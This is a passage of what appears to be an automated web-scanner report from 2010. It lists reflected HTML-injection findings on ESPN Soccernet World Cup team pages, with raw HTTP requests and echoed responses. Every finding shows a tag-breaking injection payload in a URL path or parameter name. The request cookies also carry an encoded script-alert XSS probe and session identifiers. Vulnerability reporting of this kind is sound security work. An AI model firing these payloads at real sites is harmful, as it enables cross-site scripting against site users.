Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN14
Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT
Content-Length: 81910
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chile Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile">
...[SNIP]...

5.68. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/207/chile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT
Content-Length: 82018
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chile Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29">
...[SNIP]...

5.69. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/210/paraguay

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT
Content-Length: 82073
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Paraguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach">
...[SNIP]...

5.70. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/210/paraguay

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT
Content-Length: 82181
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Paraguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b">
...[SNIP]...

5.71. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/212/uruguay

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT
Content-Length: 81983
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Uruguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place">
...[SNIP]...

5.72. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/212/uruguay

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Uruguay Football /
...[SNIP]...
<a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178">
...[SNIP]...

5.73. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/215/honduras

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:37 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT
Content-Length: 81718
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Honduras Football /
...[SNIP]...
<a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point">
...[SNIP]...

5.74. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/215/honduras

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:25 GMT
Content-Type: text/html; charset=iso-8859-1
